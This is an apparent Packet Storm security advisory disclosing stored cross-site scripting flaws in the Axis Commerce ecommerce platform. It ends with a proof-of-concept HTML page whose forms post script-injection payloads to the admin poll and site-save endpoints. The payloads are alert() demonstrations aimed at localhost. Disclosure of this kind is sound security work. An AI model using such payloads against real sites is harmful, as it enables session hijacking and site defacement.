Axis Commerce Cross Site Scripting

Type packetstorm
Reporter LiquidWorm
Modified 2012-11-30T00:00:00


Axis Commerce Remote Script Insertion Vulnerabilities  
Vendor: Axis  
Product web page:  
Affected version:  
Summary: Powerful open source ecommerce platform.  
Desc: Axis Commerce suffers from multiple stored  
XSS vulnerabilities when input passed via several  
parameters to several scripts is not properly  
sanitized before being returned to the user. This  
can be exploited to execute arbitrary HTML and  
script code in a user's browser session in context  
of an affected site.  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2 (Win32)  
PHP 5.4.4  
MySQL 5.5.25a  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2012-5115  
Advisory URL:  
<title>Axis Commerce Remote Script Insertion Vulnerabilities</title>  
<body><center><br />  
<form method="POST" action="http://localhost/axis/admin/core/site/batch-save">  
<input type="hidden" name="data" value='{"2":{"id":"2",  
"root_category":"2"}}' />  
<input type="submit" value="Go Site" />  
</form><br />  
<form method="POST" action="http://localhost/axis/admin/poll/save">  
<input type="hidden" name="answer[-1][1]" value='"><script>alert(1);</script>' />  
<input type="hidden" name="description[1]" value='"><script>alert(2);</script>' />  
<input type="hidden" name="id" value="" />  
<input type="hidden" name="sites" value="1" />  
<input type="hidden" name="status" value="1" />  
<input type="hidden" name="type" value="0" />  
<input type="submit" value="Go Poll" />